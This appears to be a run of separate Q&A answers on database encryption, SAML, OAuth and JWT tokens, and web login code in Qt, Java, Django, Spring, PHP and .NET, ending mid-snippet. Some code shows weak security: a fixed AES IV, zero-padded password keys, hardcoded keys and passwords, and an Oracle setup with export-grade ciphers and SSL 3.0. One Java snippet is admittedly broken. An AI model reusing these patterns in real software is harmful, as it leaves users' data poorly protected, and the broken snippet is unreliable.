include($$PWD/../../../3rdparty/sqlcipher.pri) #<-- change path of sqlite.pri to sqlcipher.pri here ! } else { LIBS += $$QT_LFLAGS_SQLITE QMAKE_CXXFLAGS *= $$QT_CFLAGS_SQLITE } The remaining two files in this directory need not to be changed. Create file 'sqlcipher.pri' in directory C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\3rdparty with following content: CONFIG(release, debug|release):DEFINES *= NDEBUG DEFINES += SQLITE_OMIT_LOAD_EXTENSION SQLITE_OMIT_COMPLETE SQLITE_ENABLE_FTS3 SQLITE_ENABLE_FTS3_PARENTHESIS SQLITE_ENABLE_RTREE SQLITE_HAS_CODEC !contains(CONFIG, largefile):DEFINES += SQLITE_DISABLE_LFS contains(QT_CONFIG, posix_fallocate):DEFINES += HAVE_POSIX_FALLOCATE=1 winrt: DEFINES += SQLITE_OS_WINRT winphone: DEFINES += SQLITE_WIN32_FILEMAPPING_API=1 qnx: DEFINES += _QNX_SOURCE INCLUDEPATH += $$PWD/sqlcipher c:/openssl-win32/include SOURCES += $$PWD/sqlcipher/sqlite3.c LIBS += -L$$PWD/sqlcipher/lib -lsqlcipher -leay32 -lsqlite3 TR_EXCLUDE += $$PWD/* Create and fill C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\3rdparty\sqlcipher Create the two directories: C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\3rdparty\sqlcipher C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\3rdparty\sqlcipher\lib Copy the following files to C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\3rdparty\sqlcipher: C:\temp\sqlcipher-master\shell.c C:\temp\sqlcipher-master\sqlite3.c C:\temp\sqlcipher-master\sqlite3.h C:\temp\sqlcipher-master\sqlite3ext.h Copy the following files/directories to C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\3rdparty\sqlcipher\lib: C:\temp\sqlcipher-master\dist\lib C:\temp\sqlcipher-master\sqlite3.dll C:\OpenSSL-Win32\bin\libeay32.dll The directory now consists of the following files and directories: C:\QT\QT5.4.0\5.4\SRC\QTBASE\SRC\3RDPARTY\SQLCIPHER | shell.c | sqlite3.c | sqlite3.h | sqlite3ext.h | \---lib | libeay32.dll | libsqlcipher.a | libsqlcipher.la | sqlite3.dll | \---pkgconfig sqlcipher.pc Compile the QSQLCIPHER-driver-plugin for Qt: Open Qt-command line C:\Windows\System32\cmd.exe /A /Q /K C:\Qt\Qt5.4.0\5.4\mingw491_32\bin\qtenv2.bat Execute the following commands: cd C:\Qt\Qt5.4.0\5.4\Src\qtbase\src\pluins\sqldrivers\sqlcipher qmake mingw32-make This builds the QSQLCIPHER-driver-plugin within the following directory: C:\QT\QT5.4.0\5.4\SRC\QTBASE\PLUGINS\SQLDRIVERS libqsqlcipher.a libqsqlcipherd.a qsqlcipher.dll qsqlcipherd.dll Copy 'qsqlcipher.dll' and 'qsqlcipherd.dll' to the SQL-driver-plugin-directory C:\Qt\Qt5.4.0\5.4\mingw491_32\plugins\sqldrivers. Create a new encrypted SQLite/SQLCipher-database Create new SQLite-Plaintext-database 'plaintext.db' with a test table and some test data Change directory to C:\sqlcipher, which contains 'sqlcipher.exe' and 'sqlite3.dll' (see above). C:\sqlcipher>sqlcpher.exe plaintext.db SQLCipher version 3.8.6 2014-08-15 11:46:33 Enter ".help" for instructions Enter SQL statements terminated with a ";" sqlite> create table testtable (id integer, name text); sqlite> insert into testtable (id,name) values(1,'Bob'); sqlite> insert into testtable (id,name) values(2,'Charlie'); sqlite> insert into testtable (id,name) values(3,'Daphne'); sqlite> select * from testtable; 1|Bob 2|Charlie 3|Daphne sqlite> .exit Open C:\sqlcipher\plaintext.db using a standard text-editor: Database scheme and test data can be read in plaintext. Encrypting the plaintext-database This will create the database C:\sqlcipher\encrypted.db using the key 'testkey'. C:\sqlcipher>sqlcipher.exe plaintext.db SQLCipher version 3.8.6 2014-08-15 11:46:33 Enter ".help" for instructions Enter SQL statements terminated with a ";" sqlite> ATTACH DATABASE 'encrypted.db' AS encrypted KEY 'testkey'; sqlite> SELECT sqlcipher_export('encrypted'); sqlite> DETACH DATABASE encrypted; sqlite> .exit Open C:\sqlcipher\encrypted.db using a standard text-editor: Data are now encrypted. For more useful information visit: https://www.zetetic.net/sqlcipher/sqlcipher-api/ Usage of the SQLite-database with SQLCipher-extension and access via Qt Create a new Qt-command-line-project e.g. 'qsqlcipher' Project file QT += core sql QT -= gui TARGET = qsqlcipher CONFIG += console CONFIG -= app_bundle TEMPLATE = app SOURCES += main.cpp Test-program 'main.cpp' #include <QCoreApplication> #include <QSqlDatabase> #include <QSqlQuery> #include <QDebug> #include <QString> int main(int argc, char *argv[]) { QCoreApplication a(argc, argv); qDebug() << QSqlDatabase::drivers(); QSqlDatabase db = QSqlDatabase::addDatabase("QSQLCIPHER"); db.setDatabaseName("C:/sqlcipher/encrypted.db"); db.open(); QSqlQuery q; q.exec("PRAGMA key = 'testkey';"); q.exec("insert into testtable (id,name) values(4,'dummy')"); q.exec("SELECT id,name anz FROM testtable"); while (q.next()) { QString id = q.value(0).toString(); QString name = q.value(1).toString(); qDebug() << "id=" << id << ", name=" << name; } db.close(); return 0; } Compile and execute ("QSQLCIPHER", "QSQLITE", "QMYSQL", "QMYSQL3", "QODBC", "QODBC3", "QPSQL", "QPSQL7") id= "1" , name= "Bob" id= "2" , name= "Charlie" id= "3" , name= "Daphne" id= "4" , name= "dummy" When delivering a Qt-program do not forget the Qt-libraries, the platforms-libraries, SQL-driver-plugin 'qsqlcipher.dll' and the OpenSSL-library 'libeay32.dll'. Example for the test program above: C:\TEMP\QSQLCIPHER-TEST | icudt53.dll | icuin53.dll | icuuc53.dll | libeay32.dll | libgcc_s_dw2-1.dll | libstdc++-6.dll | libwinpthread-1.dll | qsqlcipher.exe | Qt5Core.dll | Qt5Sql.dll | +---platforms | qminimal.dll | qoffscreen.dll | qwindows.dll | \---sqldrivers qsqlcipher.dll Caution: The test program contains the key: ... q.exec("PRAGMA key = 'testkey';"); ... This key string in the binary file of the test program can easiliy be read using a hex-editor, which is, to my opinion, a lack in security: ... 00002C90 70 68 65 72 2F 65 6E 63 72 79 70 74 65 64 2E 64 pher/encrypted.d 00002CA0 62 00 50 52 41 47 4D 41 20 6B 65 79 20 3D 20 27 b.PRAGMA key = ' 00002CB0 74 65 73 74 6B 65 79 27 3B 00 00 00 69 6E 73 65 testkey';...inse 00002CC0 72 74 20 69 6E 74 6F 20 74 65 73 74 74 61 62 6C rt into testtabl ... For approaches how to solve this problem, ask the search engine of your own choice. ;-) E.g. search for: hide string in executable
Both projects are compatible with Shibboleth. pysaml2 is older than python3-saml, right now both support py2 and py3. Both are kinda active and documented. python3-saml follows the structure of Onelogin's SAML toolkit so if you used any other toolkit before (php-saml, ruby-saml, java-saml), will be easy for you to handle with it (similar methods, same settings). Differences Crypto: pysaml2 uses as dependecy pycryptodome to handle with cryptography and implements its own xmldsig and xmlenc classes (to manipulate signatures and encryption on XMLs). python3-saml uses as dependecy python-xmlsec and delegates on it the signature/encryption of XML elements. Functionality: pysaml2 let you deploy an Identity Provider or a Service Provider python3-saml is focused on the Service Provider Settings: In my opinion, python3-saml is easier than pysaml2, settings are more precise and its repo contains code examples on how integrate a django or a flask app and a guide at the docs. Note: I'm the author of python3-saml
The answer of your question: Does this mean that the refresh_token will be indefinitely valid or does it expire? ...can be concluded from the section 1.5 and section 10.4 of the OAuth 2.0 specification. Section 1.5 Introduction of refresh_token states: Refresh tokens are issued to the client by the authorization server and are used to obtain a new access token when the current access token becomes invalid or expires, or to obtain additional access tokens with identical or narrower scope (access tokens may have a shorter lifetime and fewer permissions than authorized by the resource owner) section 10.4 Security Considerations for refresh_token states: The authorization server MUST verify the binding between the refresh token and client identity whenever the client identity can be authenticated. When client authentication is not possible, the authorization server SHOULD deploy other means to detect refresh token abuse. For example, the authorization server could employ refresh token rotation in which a new refresh token is issued with every access token refresh response. The previous refresh token is invalidated but retained by the authorization server. If a refresh token is compromised and subsequently used by both the attacker and the legitimate client, one of them will present an invalidated refresh token, which will inform the authorization server of the breach. It can be concluded that if the authorization_server is able to verify the binding between a refresh_token and the client to whom it was issued then refresh_token can be used to obtain multiple access_token and will never expire. else the authorization sever will invalidate the old refresh_token and generate new refresh_token with every access token refresh response.
In general the easiest answer would be to say that you cannot revoke a JWT token, but that's simply not true. The honest answer is that the cost of supporting JWT revocation is sufficiently big for not being worth most of the times or plainly reconsider an alternative to JWT. Having said that, in some scenarios you might need both JWT and immediate token revocation so lets go through what it would take, but first we'll cover some concepts. JWT (Learn JSON Web Tokens) just specifies a token format, this revocation problem would also apply to any format used in what's usually known as a self-contained or by-value token. I like the latter terminology, because it makes a good contrast with by-reference tokens. by-value token - associated information, including token lifetime, is contained in the token itself and the information can be verified as originating from a trusted source (digital signatures to the rescue) by-reference token - associated information is kept on server-side storage that is then obtained using the token value as the key; being server-side storage the associated information is implicitly trusted Before the JWT Big Bang we already dealt with tokens in our authentication systems; it was common for an application to create a session identifier upon user login that would then be used so that the user did not had to repeat the login process each time. These session identifiers were used as key indexes for server-side storage and if this sounds similar to something you recently read, you're right, this indeed classifies as a by-reference token. Using the same analogy, understanding revocation for by-reference tokens is trivial; we just delete the server-side storage mapped to that key and the next time the key is provided it will be invalid. For by-value tokens we just need to implement the opposite. When you request the revocation of the token you store something that allows you to uniquely identify that token so that next time you receive it you can additionally check if it was revoked. If you're already thinking that something like this will not scale, have in mind that you only need to store the data until the time the token would expire and in most cases you could probably just store an hash of the token so it would always be something of a known size. As a last note and to center this on OAuth 2.0, the revocation of by-value access tokens is currently not standardized. Nonetheless, the OAuth 2.0 Token revocation specifically states that it can still be achieved as long as both the authorization server and resource server agree to a custom way of handling this: In the former case (self-contained tokens), some (currently non-standardized) backend interaction between the authorization server and the resource server may be used when immediate access token revocation is desired. If you control both the authorization server and resource server this is very easy to achieve. On the other hand if you delegate the authorization server role to a cloud provider like Auth0 or a third-party component like Spring OAuth 2.0 you most likely need to approach things differently as you'll probably only get what's already standardized. An interesting reference This article explain a another way to do that: Blacklist JWT It contains some interesting pratices and pattern followed by RFC7523
First thing domain controller is server having Active Directory(a kind of organisation database). Active directory identified every component/resources connected into domain whether logical(user) and physical(computer and printer) as a object. This object has properties known as Schema. This schema has been catalog in repositories known as GC(Global catalogue) but gc has only partial information so that resources can be located. Now, coming to this policies. There is two thing GPO and OU. GPO is set of policies that you can apply on OU or higher grouping unit. Let's see how communication happen. Again, there is two widely used term 1. replication and 2. LDAP Query. Replication is done between controller so that network traffic can be reduced and for higher availability for resources connected to server. In replication, all resource information has synchronized with server. To ensure security integrity, there is certificate(which gives identification as well encryption mechanism) and delegation(providing rights). LDAP is protocol through which user has been authenticated. So LDAP has query which quiet similar to other query language. Well all this query has been logged ultimately to server. GPO has been replicated on resources or you can apply forcibly. If you want to do it immediately.
I'm sharing you my precious Encryption class my english friend. package Encriptacion; import javax.crypto.*; import java.io.*; import java.nio.*; import java.nio.channels.*; import javax.crypto.spec.*; public class EncriptadorAES { private SecretKey CLAVESECRETA=null; private final int AES_KEYLENGTH = 128; private IvParameterSpec IV=null; public EncriptadorAES() throws Exception{ //generarIV(); if(new File("initvectoraes.iv").exists()){ this.IV=new IvParameterSpec(obtenerIV()); } } public void setCLAVESECRETA(String clave){ this.CLAVESECRETA=generarClaveSecreta(clave); } public void guardarClave(String clave,String ruta)throws Exception{ try{ byte[]bytesClave=generarClaveSecreta(clave).getEncoded(); FileChannel canalSalida=new RandomAccessFile(new File(ruta), "rw").getChannel(); ByteBuffer bufferSalida=ByteBuffer.wrap(bytesClave); canalSalida.write(bufferSalida); canalSalida.close(); }catch(Exception ex){ throw new Exception("No se pudo guardar la clave\n"+ex); } } public SecretKey cargarClave(String ruta)throws Exception{ try{ File archivo=new File(ruta); byte[]bytesClave=new byte[(int)archivo.length()]; FileChannel canalEntrada=new RandomAccessFile(archivo, "r").getChannel(); ByteBuffer bufferEntrada=ByteBuffer.allocate(bytesClave.length); canalEntrada.read(bufferEntrada); bufferEntrada.flip(); bufferEntrada.get(bytesClave); canalEntrada.close(); return new SecretKeySpec(bytesClave, "AES"); }catch(Exception ex){ throw new Exception("No se pudo cargar la clave secreta\n"+ex); } } public void encriptarArchivo(String ruta,SecretKey clave) throws Exception{ File archivo=null; try { archivo=new File(ruta); if(archivo.isFile()&&archivo.exists()&&archivo.length()<=700248752){ //LECTURA byte[] bytesArchivo=new byte[(int)archivo.length()]; int tamañoBloque=AES_KEYLENGTH/8; int numBloques=((int)archivo.length()%tamañoBloque==0)?(int)archivo.length()/tamañoBloque:((int)archivo.length()/tamañoBloque)+1; int tamañoEncriptado=((bytesArchivo.length/tamañoBloque)+1)*tamañoBloque; FileChannel canalEntrada=new RandomAccessFile(archivo, "r").getChannel(); ByteBuffer bufferEntrada=ByteBuffer.allocate((int)archivo.length()); canalEntrada.read(bufferEntrada); bufferEntrada.flip(); bufferEntrada.get(bytesArchivo); canalEntrada.close(); //CIFRADO clave simétrica ByteBuffer bufferSalida=ByteBuffer.allocate(tamañoEncriptado); Cipher cifradorAES = Cipher.getInstance("AES/CBC/PKCS5Padding"); cifradorAES.init(Cipher.ENCRYPT_MODE, clave,this.IV); bufferSalida.put(cifradorAES.doFinal(bytesArchivo)); bufferSalida.flip(); //ESCRITURA if(archivo.delete()){ FileChannel canalSalida=new RandomAccessFile(archivo,"rw").getChannel(); canalSalida.write(bufferSalida); canalSalida.close(); }else throw new Exception("No se pudo borrar el archivo "+archivo.getName()+", si lo tiene abierto, ciérrelo."); }else{ if(!archivo.exists())throw new Exception("El archivo "+archivo.getName()+" no existe"); if(!archivo.isFile())throw new Exception("No puede encriptar un directorio, trate\nde comprimirlo antes para luego encriptar los archivos"); if(archivo.length()>700248752)throw new Exception("No se puede encriptar el archivo "+archivo.getName()+" porque ha superado el tamaño máximo\nde capacidad de memoria del JVM"); } } catch (Exception ex){ throw new Exception("Hubo un error al encriptar el archivo\n"+ archivo.getName() +"\n"+ex); } } public void desencriptarArchivo(String ruta,SecretKey clave)throws Exception{ File archivoEncriptado=null; try{ archivoEncriptado=new File(ruta); if(archivoEncriptado.exists()){ //LECTURA byte[]bytesArchivoEncriptado=new byte[(int)archivoEncriptado.length()]; int tamañoBloque=AES_KEYLENGTH/8; int numBloques=((int)archivoEncriptado.length()%tamañoBloque==0)?(int)archivoEncriptado.length()/tamañoBloque:((int)archivoEncriptado.length()/tamañoBloque)+1; FileChannel canalEntrada=new RandomAccessFile(archivoEncriptado, "r").getChannel(); ByteBuffer bufferEntrada=ByteBuffer.allocate((int)archivoEncriptado.length()); canalEntrada.read(bufferEntrada); bufferEntrada.flip(); bufferEntrada.get(bytesArchivoEncriptado); canalEntrada.close(); //DESCRIFRADO ByteBuffer bufferSalida=ByteBuffer.allocate((int)archivoEncriptado.length()); if(comprobarKeys(clave)){ Cipher descifradorAES = Cipher.getInstance("AES/CBC/PKCS5Padding"); descifradorAES.init(Cipher.DECRYPT_MODE,clave,this.IV); bufferSalida.put(descifradorAES.doFinal(bytesArchivoEncriptado)); bufferSalida.flip(); } else{ System.gc(); throw new Exception("La clave ingresada es incorrecta"); } //ESCRITURA if(archivoEncriptado.delete()){ FileChannel canalSalida=new RandomAccessFile(ruta, "rw").getChannel(); canalSalida.write(bufferSalida); canalSalida.close(); }else throw new Exception("No se pudo eliminar el archivo "+archivoEncriptado.getName()+", si lo tiene abierto, ciérrelo."); }else{ if(!archivoEncriptado.exists())throw new Exception("El archivo "+archivoEncriptado.getName()+" no existe"); } } catch (Exception ex){ System.gc(); throw new Exception("Hubo un error al desencriptar\n"+archivoEncriptado.getName()+":\n"+ex.getMessage()); } } public SecretKey generarClaveSecreta(String clave){ byte[]key=rellenarBytesClave(clave); SecretKey claveGenerada=new SecretKeySpec(key, "AES"); return claveGenerada; } private byte[] rellenarBytesClave(String clave){ byte[]key=clave.getBytes(); while(key.length!=AES_KEYLENGTH/8){ if(key.length<AES_KEYLENGTH/8){ clave+="0"; key=clave.getBytes(); } if(key.length>AES_KEYLENGTH/8){ clave=clave.substring(0,AES_KEYLENGTH/8); key=clave.getBytes(); } } return key; } private boolean comprobarKeys(SecretKey clave){ return this.CLAVESECRETA.equals(clave); } public void generarIV() throws Exception{ try{ byte[]VECTOR={1,6,1,2,1,9,9,7,7,9,9,1,2,1,6,1}; FileChannel canalsalida=new RandomAccessFile(new File("initvectoraes.iv"), "rw").getChannel(); MappedByteBuffer buffersalida=canalsalida.map(FileChannel.MapMode.READ_WRITE, 0, 16); buffersalida.put(VECTOR); buffersalida.force(); canalsalida.close(); }catch(Exception ex){ throw new Exception("Error al generar el Vector de Inicialización de AES\n"+ex.getMessage()); } } private byte[]obtenerIV()throws Exception{ byte[]vectorcargado=null; try{ FileChannel canalentrada=new RandomAccessFile(new File("initvectoraes.iv"), "r").getChannel(); MappedByteBuffer bufferentrada=canalentrada.map(FileChannel.MapMode.READ_ONLY, 0, 16); vectorcargado=new byte[16]; bufferentrada.get(vectorcargado); bufferentrada.load(); canalentrada.close(); } catch(Exception ex){ throw new Exception("Error al obtener el Vector de Inicialización de AES\n"+ex.getMessage()); } return vectorcargado; } } EDIT This code doesn't solve the problem but I think this could help in some way byte[] chave = "chave de 16bytes".getBytes(); IvParameterSpec IV = new IvParameterSpec(new byte[]{1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16}); String TEST = "TEST"; public String encriptaAES(String chaveCriptografada) throws InvalidKeyException, IllegalBlockSizeException, BadPaddingException, UnsupportedEncodingException, InvalidAlgorithmParameterException { try { Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding"); System.out.println("MENSAJE: "+chaveCriptografada); byte[] mensagem = chaveCriptografada.getBytes(); cipher.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(chave, "AES"), this.IV); chaveCriptografada = new String(cipher.doFinal(mensagem)); System.out.println("Mensaje encriptado: "+chaveCriptografada); chaveCriptografada = DatatypeConverter.printBase64Binary(chaveCriptografada.getBytes()); this.TEST = DatatypeConverter.printBase64Binary(TEST.getBytes()); System.out.println("TEST: "+TEST); } catch (NoSuchAlgorithmException | NoSuchPaddingException e) { e.printStackTrace(); } return chaveCriptografada; } public String descriptografaAES(String chaveCriptografada) throws NoSuchAlgorithmException, NoSuchPaddingException, IllegalBlockSizeException, BadPaddingException, UnsupportedEncodingException, InvalidAlgorithmParameterException { Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding"); System.out.println("Mensaje Encriptado CON BASE 64: "+chaveCriptografada); byte[] base64decodedBytes = DatatypeConverter.parseBase64Binary(chaveCriptografada); this.DATA=new String(DatatypeConverter.parseBase64Binary(this.DATA)); System.out.println("TEST: "+TEST); System.out.println("Mensaje Encriptado: "+new String(base64decodedBytes)); try { cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(this.chave, "AES") , this.IV); byte[] decrypted = cipher.doFinal(base64decodedBytes); chaveCriptografada = new String(decrypted); } catch (InvalidKeyException e) { e.printStackTrace(); } return chaveCriptografada; } public static void main(String[] args) throws Exception{ AESCipher cipher = new AESCipher(); String mensajeEncriptado = cipher.encriptaAES("mensaje"); System.out.println("Mensaje encriptado CON BASE 64: "+mensajeEncriptado); System.out.println("Mensaje desencriptado: "+cipher.descriptografaAES(mensajeEncriptado)); }
$key=$this->escape($key); A clear vulnerability is here. mysqli_real_escape_string escapes for SQL string syntax. Field names aren't using string syntax. Simple sample of what string escaping means: $value = "Craig O'Connor"; $query = "INSERT INTO ... VALUES ('$value')"; ^^^^^^^^ 'Craig O'Connor' -> syntax error With escaping: $value = "Craig O'Connor"; $value = mysqli_real_escape_string($con, $value); $query = "INSERT INTO ... VALUES ('$value')"; ^^^^^^^^ 'Craig O\'Connor' The string escaping mechanism escaped the '. The assumption, the prerequisite, for mysqli_real_escape_string to do anything useful is that you're going to use the result in an SQL string literal. With field names you're not doing that. String escaping therefore doesn't do anything there. And therefore you're plainly vulnerable to SQL injection. You must whitelist the allowable fields and filter them based on that whitelist. You cannot blindly accept any and all field names and simply use them as is. Not merely because it's somewhere between hard and impossible to escape field names, but also because the use of non-existing field names will result in a query error. You don't want query errors due to incorrect queries cobbled together from user input. That is to say nothing about not using prepared statements in the first place, or that you're giving a user more or less free reign within your database…
when you create the connection to your URL, need to define some properties related with the ssl key you are going to use. Example: Properties props = new Properties(); props.setProperty("user", "root"); props.setProperty("password", "root"); props.setProperty("javax.net.ssl.trustStore", "D:\\truststore\\truststore.jks"); props.setProperty("javax.net.ssl.trustStoreType","JKS"); props.setProperty("javax.net.ssl.trustStorePassword","welcome123"); Connection conn = DriverManager.getConnection(url, props); //your code If you are using hibernate: <bean id="dataSource" class="oracle.jdbc.pool.OracleDataSource"> <property name="URL" value="jdbc:oracle:thin:@//host:port/service_name"/> <property name="user" value="root"/> <property name="password" value="root"/> <property name="maxPoolSize" value="10"/> <property name="initialPoolSize" value="5"/> <property name="connectionProperties> <value> oracle.net.ssl_cipher_suites: (ssl_rsa_export_with_rc4_40_md5, ssl_rsa_export_with_des40_cbc_sha) oracle.net.ssl_client_authentication: false oracle.net.ssl_version: 3.0 oracle.net.encryption_client: REJECTED oracle.net.crypto_checksum_client: REJECTED </value> </property> </bean> <bean id="sessionFactory" class="org.springframework.orm.hibernate3.annotation.AnnotationSessionFactoryBean"> <property name="dataSource" ref="dataSource" /> <!-- classes etc --> </bean>
Maybe you can try to play with login required middleware: Django Login Required Middleware settings.py: LOGIN_URL = '/login/' LOGIN_EXEMPT_URLS = ( r'^about\.html$', r'^legal/', # allow any URL under /legal/* ) MIDDLEWARE_CLASSES = ( # ... 'python.path.to.LoginRequiredMiddleware', ) LoginRequiredMiddleware: from django.http import HttpResponseRedirect from django.conf import settings from re import compile EXEMPT_URLS = [compile(settings.LOGIN_URL.lstrip('/'))] if hasattr(settings, 'LOGIN_EXEMPT_URLS'): EXEMPT_URLS += [compile(expr) for expr in settings.LOGIN_EXEMPT_URLS] class LoginRequiredMiddleware: """ Middleware that requires a user to be authenticated to view any page other than LOGIN_URL. Exemptions to this requirement can optionally be specified in settings via a list of regular expressions in LOGIN_EXEMPT_URLS (which you can copy from your urls.py). Requires authentication middleware and template context processors to be loaded. You'll get an error if they aren't. """ def process_request(self, request): assert hasattr(request, 'user'), "The Login Required middleware\ requires authentication middleware to be installed. Edit your\ MIDDLEWARE_CLASSES setting to insert\ 'django.contrib.auth.middlware.AuthenticationMiddleware'. If that doesn't\ work, ensure your TEMPLATE_CONTEXT_PROCESSORS setting includes\ 'django.core.context_processors.auth'." if not request.user.is_authenticated(): path = request.path_info.lstrip('/') if not any(m.match(path) for m in EXEMPT_URLS): return HttpResponseRedirect(settings.LOGIN_URL)
Before everything check your OAUTH server application server and your client application server time and timezone if they are separated in two different machine. Your OAUTH Server Configuration I think has some problems. OAUTH Server itself is secured with 'BASIC ACCESS AUTHENTICATION' : https://en.wikipedia.org/wiki/Basic_access_authentication Which works with a token on his requests headers : 'Authorization' : Basic=Base64.encode(username+' '+password). If you miss this token then you can't access any endpoint on your OAUTH server. Mine works fine, you can test it: @Override protected void configure(HttpSecurity http) throws Exception { // @formatter:off http.formLogin().loginPage("/login").permitAll() .and().requestMatchers().antMatchers("/login", "/oauth/authorize", "/oauth/confirm_access", "/fonts/**", "/css/**") .and().authorizeRequests().antMatchers("/fonts/**", "/css/**").anonymous().anyRequest().authenticated(); // @formatter:on } And why have you disabled csrf protection?
You don't need to log in to get the user info. Although I'm not sure the logging in part works from a web service. UserInfo user = UserController.GetUserByName(username); if (user != null) { string email = user.Email; } else { //user not found } Or if you do want to log in for added security, you can do this: string resultText = string.Empty; UserLoginStatus loginStatus = new UserLoginStatus(); UserController.UserLogin(PortalId, username, password, null, PortalSettings.PortalName, DotNetNuke.Services.Authentication.AuthenticationLoginBase.GetIPAddress(), ref loginStatus, false); switch (loginStatus) { case UserLoginStatus.LOGIN_SUCCESS: resultText = "OK"; break; case UserLoginStatus.LOGIN_FAILURE: resultText = "Failure"; break; case UserLoginStatus.LOGIN_USERLOCKEDOUT: resultText = "Locked out"; break; case UserLoginStatus.LOGIN_USERNOTAPPROVED: resultText = "Not approved"; break; default: resultText = "Unknown error"; break; }
Give this a try. But you still need some basic knowledge about Laravel's new multitenancy. In config/auth.php add something like this to guards array: 'customer' => [ 'driver' => 'session', 'provider' => 'customers', ], Than in the same file add this to providers array: 'customers' => [ 'driver' => 'eloquent', 'model' => App\Customer::class, ], Than create Migration for customers DB table (you can use Laravel's out of the box migration for users table) Next is Eloquent model App\Customer with these included: use App\Scopes\AuthorizedScope; use Illuminate\Foundation\Auth\User as Authenticatable; These should let you use Laravel's Auth facade in your app with these most used methods: Auth::guard('customer')->attempt() Auth::guard('customer')->check() Auth::guard('customer')->logout() Auth::guard('customer')->user() Or use auth middleware like this: Route::get('customer/dashboard', function () { // Only authenticated users may enter... })->middleware('auth:customer'); Also checkout these: https://laravel.com/docs/5.3/authentication#authenticating-users
Here is a code from the article that you referred to: package com.waveaccess.someproject.commons.service; import com.waveaccess.someproject.commons.config.Const; import com.waveaccess.someproject.commons.config.properties.SharePointProperties; import com.waveaccess.someproject.commons.service.exceptions.SharePointAuthenticationException; import com.waveaccess.someproject.commons.service.exceptions.SharePointSignInException; import com.google.common.base.Joiner; import org.apache.commons.collections.CollectionUtils; import org.apache.commons.lang3.StringUtils; import org.json.JSONException; import org.json.JSONObject; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.cache.annotation.Cacheable; import org.springframework.http.HttpHeaders; import org.springframework.http.HttpMethod; import org.springframework.http.RequestEntity; import org.springframework.http.ResponseEntity; import org.springframework.stereotype.Service; import org.springframework.util.LinkedMultiValueMap; import org.springframework.util.MultiValueMap; import org.springframework.web.client.RestTemplate; import org.springframework.xml.transform.StringSource; import org.springframework.xml.xpath.XPathExpression; import org.w3c.dom.Document; import javax.xml.transform.Transformer; import javax.xml.transform.TransformerException; import javax.xml.transform.TransformerFactory; import javax.xml.transform.dom.DOMResult; import java.io.IOException; import java.net.URI; import java.net.URISyntaxException; import java.util.Calendar; import java.util.Date; import java.util.List; /** * @author Maksim Kanev */ @Service public class SharePointServiceCached { private static final Logger log = LoggerFactory.getLogger(SharePointServiceCached.class); @Autowired private RestTemplate restTemplate; @Autowired private SharePointProperties sharePointProperties; @Autowired private XPathExpression xPathExpression; @Cacheable(Const.CACHE_NAME_TOKEN) public String receiveSecurityToken(Long executionDateTime) throws TransformerException, URISyntaxException { RequestEntity<String> requestEntity = new RequestEntity<>(buildSecurityTokenRequestEnvelope(), HttpMethod.POST, new URI(sharePointProperties.getEndpoint() + "/extSTS.srf")); ResponseEntity<String> responseEntity = restTemplate.exchange(requestEntity, String.class); DOMResult result = new DOMResult(); Transformer transformer = TransformerFactory.newInstance().newTransformer(); transformer.transform(new StringSource(responseEntity.getBody()), result); Document definitionDocument = (Document) result.getNode(); String securityToken = xPathExpression.evaluateAsString(definitionDocument); if (StringUtils.isBlank(securityToken)) { throw new SharePointAuthenticationException("Unable to authenticate: empty token"); } log.debug("Microsoft Online respond with Token: {}", securityToken); return securityToken; } private String buildSecurityTokenRequestEnvelope() { String envelopeTemplate = "<s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://www.w3.org/2005/08/addressing\" xmlns:u=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\"> <s:Header> <a:Action s:mustUnderstand=\"1\">http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue</a:Action> <a:ReplyTo> <a:Address>http://www.w3.org/2005/08/addressing/anonymous</a:Address> </a:ReplyTo> <a:To s:mustUnderstand=\"1\">https://login.microsoftonline.com/extSTS.srf</a:To> <o:Security s:mustUnderstand=\"1\" xmlns:o=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\"> <o:UsernameToken> <o:Username>%s</o:Username> <o:Password>%s</o:Password> </o:UsernameToken> </o:Security> </s:Header><s:Body><t:RequestSecurityToken xmlns:t=\"http://schemas.xmlsoap.org/ws/2005/02/trust\"><wsp:AppliesTo xmlns:wsp=\"http://schemas.xmlsoap.org/ws/2004/09/policy\"><a:EndpointReference><a:Address>" + sharePointProperties.getEndpoint() + "</a:Address></a:EndpointReference></wsp:AppliesTo><t:KeyType>http://schemas.xmlsoap.org/ws/2005/05/identity/NoProofKey</t:KeyType> <t:RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</t:RequestType> <t:TokenType>urn:oasis:names:tc:SAML:1.0:assertion</t:TokenType></t:RequestSecurityToken></s:Body></s:Envelope>"; return String.format(envelopeTemplate, sharePointProperties.getUsername(), sharePointProperties.getPassword()); } @Cacheable(Const.CACHE_NAME_COOKIE) public List<String> getSignInCookies(String securityToken) throws TransformerException, URISyntaxException { RequestEntity<String> requestEntity = new RequestEntity<>(securityToken, HttpMethod.POST, new URI(sharePointProperties.getEndpoint() + "/_forms/default.aspx?wa=wsignin1.0")); ResponseEntity<String> responseEntity = restTemplate.exchange(requestEntity, String.class); HttpHeaders headers = responseEntity.getHeaders(); List<String> cookies = headers.get("Set-Cookie"); if (CollectionUtils.isEmpty(cookies)) { throw new SharePointSignInException("Unable to sign in: no cookies returned in response"); } log.debug("SharePoint respond with cookies: {}", Joiner.on(", ").join(cookies)); return cookies; } public String getFormDigestValue(List<String> cookies) throws IOException, URISyntaxException, TransformerException, JSONException { MultiValueMap<String, String> headers = new LinkedMultiValueMap<>(); headers.add("Cookie", Joiner.on(';').join(cookies)); headers.add("Accept", "application/json;odata=verbose"); headers.add("X-ClientService-ClientTag", "SDK-JAVA"); RequestEntity<String> requestEntity = new 